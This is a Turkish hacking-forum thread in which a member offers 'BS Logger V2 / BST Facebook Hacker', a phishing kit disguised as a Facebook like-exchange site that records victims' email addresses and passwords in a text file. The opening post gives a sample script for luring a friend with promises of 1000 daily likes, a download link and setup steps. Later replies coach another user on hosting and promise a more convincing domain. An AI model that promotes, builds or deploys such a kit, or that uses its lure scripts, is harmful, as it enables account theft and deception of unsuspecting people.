BST Facebook Hacker Yayında ! // (Bs Logger V2)

'Heisenberg

Uzman üye
17 Eki 2014
1,723
20
Antalya
8QAyla.png


BS Logger V2 - TurkHackTeam.Org
(BST Facebook Hacker)

Merhaba arkadaşlar, yeni bir Sosyal Mühendislik scripti ile karşınızdayım bugün de :) Aslında pek de yeni bir şey sayılmaz. Mantığı Bs Logger V1 ile aynı hemen hemen. Daha inandırıcı bir hal kazandı bu versiyonda :) Neyse, uzatmadan geçeyim anlatımına:

Sistem çok basit aslında. Facebook Like sitesi görünümünde bir logger. Günlük 1000 beğeni limitini duyan herkes, denemek isteyecek ve üye olacak. Ancak üye olmak veya giriş yapmak istediklerinde, tekrar ana sayfaya yönlendirilecekler ve sitenin bozuk olduğunu düşünecekler. Ama onlar bilgilerini (e-mail adresi ve parolasını) yazıp üye olmaya çalıştıklarında biz çoktan loglamış olacağız şifre ve e-posta adreslerini :) Yani onlar durum,fotoğraf ve yorumlarını beğendirmekten ibaret sanacaklar siteyi. Ancak biz şifrelerini tere yağından kıl çeker gibi alacağız bu sistemle :)

Örnek Bir SM Diyalogu:

SM: Sosyal Mühendis
K: Kurban


SM: Knk bir site buldum, günlük 1000 beğeni yolluyor.
K: Nasıl ?
SM: Ya işte internette var ya facebook durum beğendirme siteleri falan.
K: Eee ?
SM: Bu sitede her gün 1000 beğeni yollanıyor işte..
K: Hadi yaa harbiden mi ?
SM: Tabi olm. ben sana yalan söyler miyim hiç (!) ?
K: Gönder bakıyım deneyelim bi.
SM: Al bakalım: fakesiteadresi.com
K: Tamamdır sağ ol.


Artık bunun gibi bir diyalog uydurup, karşıda ki kişiyi ikna etmeniz lazım. Daha sonra olacakları, arkanıza yaslanıp seyredebilirsiniz :)

9E0OoQ.png


Not: Kurbanımız şifreyi girmişse, bilgileri siteadresi.com/veriler.txt kısmına gelecektir...

İNDİRME LİNKİ: Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
VİRÜS TOTAL: https://www.virustotal.com/tr/file/...4a5f8cbeb86a4f68817b6821/analysis/1448127660/

KURULUM YÖNERGESİ

İndirdiğiniz Dosyaları Rar'dan Çıkarın,
Klasöre Girip, Config.Php İsimli Dosyayı Bulup Açın,
Ve Aşağıdaki Alanları Kendinize Göre Düzenleyin:

RB2qm1.png


........................
Zorunlu Not:

Site tarafımca kodlanmıştır ancak kullanımı tamamen kullanıcı sorumluluğundadır. Oluşabilecek, hiçbir yasal sorunu kabul etmiyorum. İyi veya kötü kullanımı kullanıcıya aittir.
........................


DipNot: Sitenin kodlamasında takıldığım yerlerde yardımcı olan T3RMiN4TOR 'e bir teşekkürü borç bilirim :) Yardımları ve önerileri için buradan kendisine teşekkür ediyor, ve programımın ismini ona ithafen BST Facebook Hacker koyuyorum ... :)

TurkHackTeam.Org // 'Black-Sight



48XXOA.png


BS Logger V1 'i Görüntülemek İçin Lütfen Buraya Tıklayınız !
FakeFacebook V1 'i Görüntülemek İçin Lütfen Buraya Tıklayınız !
FakeFacebook V2 'yi Görüntülemek İçin Lütfen Buraya Tıklayınız !
 
Son düzenleme:

'Heisenberg

Uzman üye
17 Eki 2014
1,723
20
Antalya
Sağolun arkadaşlar yorumlarınız için :) Aklımda bir proje daha var. İnşallah V3 'ü de final versiyon olarak çıkartıp yavaştan noktayı koyacağım yakında .. :)
 

alpaysargul

Yeni üye
22 Kas 2015
9
0
selam ben bu host kısmına felan ne yazacağımı tam olarak anlayamadım bana bu konuda yardımcı olabilirmisiniz
 

'Heisenberg

Uzman üye
17 Eki 2014
1,723
20
Antalya
selam ben bu host kısmına felan ne yazacağımı tam olarak anlayamadım bana bu konuda yardımcı olabilirmisiniz

Bkz: Host Nedir ? Domain Nedir ? FTP Nedir ?

Eğer, ben Host-Domain işlerinden anlamam, beceremem diyorsanız, konuya koyduğum "Demo" üzerinden de, işinizi görebilirsiniz... İnandırıcı olması bakımından, güzel bir domain satın alıp konuya ekleyeceğim yakın zaman içerisinde. Merak ettiğinizi soruları, ÖM (Özel Mesaj) yoluyla sorabilirsiniz.
 

'Heisenberg

Uzman üye
17 Eki 2014
1,723
20
Antalya
Arkadaşlar; daha gerçekçi olması bakımından, yarın siteye özel bir alan adı satın alıp, "Demo 2" olarak ekleyeceğim konuya. Henüz kullanmadıysanız, bekleyin yarın onu kullanırsınız. Dahi inandırıcı olacak o şekilde...
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.